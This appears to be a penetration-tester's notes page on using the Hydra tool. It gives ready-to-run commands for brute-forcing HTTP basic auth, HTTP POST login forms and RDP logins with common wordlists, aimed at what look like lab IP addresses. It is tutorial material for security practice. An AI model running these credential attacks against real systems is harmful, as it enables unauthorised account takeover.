Hydra

Hydra Supported Services

hydra -h | grep "Supported services" | tr ":" "\n" | tr " " "\n" | column -e

HTTP AUTH Bruteforce

We can use hydra to pass it colon seperated wordlist with default credentials and we can try to do a bruteforce attack on the http login, i will use the wordlist from seclists which containes the default credentials by colon seperation

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt http-get://94.237.53.3:40213/
Successfull Login using the creds found

Hydra POST Form BruteForce Attack

If you have a login page and you need to bruteforce the creds for that, one way is you can use the burpsuite Intruder, the Second thing which we can use is Hydra Post Form as well

there are 3 things we need to add after http-post-form, -s is for port

  1. Login Endpoint

  2. Parameters

  3. Fail or success msg OR Something from Page Source

hydra -l admin -P /usr/share/wordlists/rockyou.txt 94.237.63.83 -s 51867 http-post-form "/login.php:username=^USER^&password=^PASS^:<form name='login'" -f

Hydra on RDP Port 3389

hydra -L users.txt -P passwords.txt rdp://127.0.0.1

Hydra on RDP with Multipe IPs

hydra -L users.txt -P passwords.txt -M IPs.txt rdp

PreviousMethodologyNextCewl

Last updated